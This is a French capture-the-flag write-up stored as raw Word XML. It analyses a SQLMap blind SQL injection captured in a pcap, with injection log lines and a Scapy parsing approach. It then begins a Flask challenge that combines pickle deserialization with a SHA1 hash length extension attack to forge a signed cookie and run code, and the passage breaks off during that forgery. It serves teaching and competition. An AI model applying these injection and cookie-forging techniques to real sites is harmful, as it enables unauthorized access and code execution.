        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc1607086487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 300 - Stolen Data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On avait un fichier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> .pcap </w:t>
      </w:r>
      <w:r>
        <w:t>qui est une capture réseau contenant une attaque sur un site. On l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’ouvre avec Wireshark et on observe les trames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5845175" cy="777875"/>
            <wp:effectExtent l="0" t="0" r="3175" b="317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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5845175" cy="777875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On reconnait tout de suite une tentative d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’injection SQL, l’User-Agent nous indique une attaque faite avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5847715" cy="749300"/>
            <wp:effectExtent l="0" t="0" r="635" b="317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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5847715" cy="749300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On filtre la trame pour ne garder que les requêtes HTTP contenant une injection “AND ORD MID”. On remarque que la technique utilisée est une Blind SQL donc on va regarder le Content-Length pour savoir si l’injection a réussie.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80"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:t>Content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>Length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>72X</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Result</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>full</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>worked</w:t>
            </w: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8000"/>
              </w:rPr>
              <w:t>"Content-Length:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>72"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>pkts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>][</w:t>
            </w:r>
            <w:r>
              <w:t>Raw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</w:t>
            </w:r>
            <w:r>
              <w:t>load</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000080"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:t>Content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>Length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>26X</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Result</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>an</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>empty</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>failed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"Content-Length:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>26"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>pkts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>][</w:t>
            </w:r>
            <w:r>
              <w:t>Raw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</w:t>
            </w:r>
            <w:r>
              <w:t>load</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap effectue des injections blind optimisées, elles fonctionnent par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dichotomie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>. Pour chaque caractère de la chaîne elle regarde si son code ASCII est supérieur à seuil. Si la requête renvoie vrai alors elle augmente le seuil sinon elle le diminue. Dans l’exemple ci-dessous le script a parsé les requêtes de la capture et affiche la lettre testée.</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194 0 0 1 72  ORDER BY id LIMIT 0,1),1,1))&gt;72 : H   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>195 1 0 1 68  ORDER BY id LIMIT 0,1),1,1))&gt;68 : H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>196 0 0 1 70  ORDER BY id LIMIT 0,1),1,1))&gt;70 : F</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197 0 0 1 69  ORDER BY id LIMIT 0,1),1,1))&gt;69 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On peut scripter toute la résolution du challenge en utilisant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">en python On obtient la sortie ci-dessous. Les participants du CTF ont souvent fait l’erreur de prendre uniquement la dernière ligne pour chaque caractère, cela introduisait des erreurs dans leur flag car SQLMap optimise à fond les requêtes, il faut garder la plus haute valeur ascii de chaque caractère testé </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5850890" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="6985"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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5850890" cy="933450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On obtient ainsi le flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESE{SQLi_4lWays_And_F0r3v3r}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>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42" w:name="_Toc498656096"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 400 - Escalade Me</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5850255" cy="1486535"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="27" name="Picture 27" descr="flas_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flas_screen"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5850255" cy="1486535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On nous indique que l'appli web a été développée avec Flask, un framework web pour python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On commence par se créer un compte 'toto' et on se loggue avec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Dans nos cookies on observe un cookie 'user_info' encodé en base64 et un cookie session_hash qui semble être un hash sha1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le cookie user_info, une fois décodé nous donne: V2:e5453d1acd99bdadab0af3b446cae840eb0bd3b7:toto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>np0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Si la sérialization en Python vous est familière alors vous devinez que ça ressemble à un objet sérialisé avec Pickle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Si on essaie de désérialiser notre user_info on obtient un EOFError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>En effet il manque un retour à la ligne (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>n) et un point (.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Avec Pickle on peut éxécuter du code avec un objet aproprié (cf. gen_sploit.py):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Si on essaie de le passer en base64 dans le cookie user_info on obtient un: "Hacking attempted !"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>A ce stade, on peut supposer que le cookie session_hash est un hash qui vérifie l'intégrité des informations contenues dans user_info.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hypothèse:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>session_hash = sha1(KEY + user_info)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Si on suit cette hypothèse, on est en face d'un Hash Length Extension qui nous permettrait de rajouter du contenu à la fin de user_info.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Dans un premier temps, nous devons trouver la longueur de la clef KEY utilisée pour signer l'information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Soit S(keylen, msg_to_add) notre fonction qui nous retourne le nouveau message et sa signature sha1 en fonction de la longueur de la clef et du message à ajouter au message original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Il nous suffit d'ajouter un message vide et d'incrémenter keylen tant que l'on obtient "Hacking attempted !":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Pour i = 0 à 50:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>nv_msg, nvlle_sig = S(i, '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>si pas 'attempted' dans envoyer(nv_msg, nvlle_sig):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>retourner i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Une fois la longueur de la clef trouvée (9) on peut forger un nouveau cookie user_info afin d'éxécuter du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Pour cela, il nous faut créer un second objet sérialisé à la suite du premier afin de l'écraser:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>V2:e5453d1acd99bdadab0af3b446cae840eb0bd3b7:toto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
